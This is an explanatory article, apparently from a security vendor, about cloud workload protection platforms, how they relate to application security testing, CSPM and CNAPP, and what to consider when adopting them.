The transition to the cloud – and the accompanying transformation in the way applications are developed and deployed – created a need for new security tools. Cloud workload protection platforms (CWPP) are one of the product categories that emerged to fill that need. They aim to protect software running in hybrid cloud environments that include multiple public clouds as well as in-house data centers. These platforms are designed to provide a consistent way to monitor and control workloads across the entire environment, no matter where the workloads are located.
What is CWPP?
Cloud workload protection platforms are security products that protect workloads distributed across multiple cloud environments and enterprise data centers, regardless of their location. A CWPP should provide consistent security monitoring and control across workloads, whether they’re in containers or virtual machines (VMs), running serverless, or on traditional physical servers.
CWPPs provide a range of features to protect workloads at runtime, including network segmentation, vulnerability scanning, system integrity assurance, application control and whitelisting, behavioral monitoring, and malware scanning. They prevent unauthorized access to workloads and help ensure that workloads are kept up to date with the latest security patches. CWPPs also scan for workload vulnerabilities in the development pipeline.
How workload protection differs from application security
The lines between application security (AppSec) and workload protection are blurring. Traditionally, AppSec has focused on finding vulnerabilities in the code that developers generate. But today, applications can consist of code from many different sources because developers create applications by combining newly written code with multiple existing components. CWPPs check for security vulnerabilities in entire cloud application workloads, from the hypervisor to the application layer. AppSec tools look for vulnerabilities specifically within the application layer, covering both newly written code and any external components that the application uses.
There are several major approaches to AppSec:
- Dynamic application security testing (DAST) tools perform security testing on a running application to find security vulnerabilities and misconfigurations. DAST is an important security tool both during application development and in production.
- Software composition analysis (SCA) discovers the open-source components that an application uses and checks whether they are known to be vulnerable.
- Static application security testing (SAST) looks for vulnerabilities in static source code, bytecode, or binary code.
- Interactive application security testing (IAST) tools interact with a running application and observe it from the inside in real time. IAST helps to pinpoint security problems in application code.
Why is cloud workload protection important?
Cloud workload protection has become vital for many organizations because of two concurrent trends: the shift to hybrid cloud environments and the accelerating pace of application development.
Over the past decade or more, the transition to the cloud has seen organizations moving away from monolithic applications running on in-house servers. Many companies now operate a hybrid cloud environment that utilizes services in multiple public clouds while often retaining some on-premises infrastructure. In this environment, applications typically consist of many workloads – which may be distributed across multiple public clouds as well as on premises. Some workloads may be short-lived, existing only for the few minutes or even seconds that they’re needed to perform a service. Even so, any of these workloads presents a potential attack opportunity, so it’s vital to be able to protect workloads wherever they execute.
Developers also now generate more applications much more rapidly, at lower cost, using a cloud-native development approach commonly known as continuous integration/continuous delivery (CI/CD). Applications are created, tested, and deployed in a continuous automated cycle, using a microservices architecture that accelerates development by combining new code with existing components from multiple sources. “We’re allowing developers to spin up things like infrastructure-as-code and ephemeral application services that run only when needed. We need to make sure there are guardrails in place to ensure we’re not launching code with vulnerabilities,” says Frank Catucci, Chief Technology Officer and Head of Security Research at Invicti Security. CWPP products, in conjunction with other security tools, are designed to help provide those guardrails by monitoring and protecting all workloads – wherever they are located.
Benefits of a CWPP
A CWPP can provide a range of security benefits, including:
- Consistent protection. Organizations have a consistent level of visibility and protection for all their workloads, even if those workloads are spread across multiple clouds. A single CWPP should protect VMs, containers, and serverless workloads. Staff can be alerted to threats to any workload anywhere in the environment.
- Less complexity. Security teams don’t need to learn different workload security tools to manage each environment. They can apply automation across all workloads, no matter where they are running. Because the CWPP consolidates data from all workloads, staff can more easily analyze security data from across the entire environment.
- Efficiency. Using a single workload protection tool across multiple clouds should also mean that the security team can operate more efficiently – achieving more with less effort. That translates into lower operating costs.
- Rapid development. A CWPP should facilitate rapid application development by integrating with software development tools and scanning containers and other application components for vulnerabilities.
CWPP vs. CSPM
In the past, cloud security posture management (CSPM) tools and CWPPs were distinct categories of security tools. CSPM products emerged early in the evolution of the cloud to address one of the most common causes of breaches: configuration and compliance errors. They continuously scan software for risks caused by misconfigurations and deviations from security and regulatory policies.
More recently, the CSPM and CWPP categories have begun merging as suppliers look to build more comprehensive tools that couple configuration and compliance management with workload protection features. “It’s a natural merging of these capabilities,” Catucci says. “Many organizations, unless they have a very unique use case, are going to want all of these pieces to be included in one solution.”
CWPP vs. CNAPP
Cloud-native application protection platforms (CNAPP) are a new product category that’s emerging as vendors attempt to provide comprehensive cloud security spanning the entire software lifecycle. Over time, CNAPP products are expected to evolve to combine CWPP and CSPM features for protecting workloads and cloud configurations at runtime, plus additional capabilities for scanning workloads and configurations during development.
How to implement a CWPP in your organization
Because the lines between CWPP and CSPM are blurring, it makes sense to look for products that combine the capabilities of both, providing an integrated set of cloud security tools. Over time, you’re likely to see suppliers increasingly describing these integrated products as CNAPP rather than CWPP or CSPM.
Development teams will still need application security testing tools such as DAST, SAST, SCA, and IAST to test their software for security defects both during development and in staging. It’s important to select AppSec tools that integrate directly into your development pipeline, either out-of-the-box or via internal APIs, and that support your planned deployment methods, whether that means running in VMs, containers, or serverless. The sheer variety of underlying technologies and cloud deployment options makes dynamic testing especially important, as it’s a black-box approach that tests a running web application regardless of the way it is deployed.
The place of CWPP in cloud security
Cloud workload protection platforms are important security tools for organizations with applications that span multiple public cloud environments. The capabilities of these tools are increasingly being integrated into broader product suites known as cloud-native application protection platforms (CNAPP) designed to protect workloads throughout the development and production lifecycle. As the purpose of cloud workloads is to run software, in addition to protecting the workloads themselves, organizations also need integrated development and application security testing tools that will enable them to efficiently and securely build the software that runs within these workloads.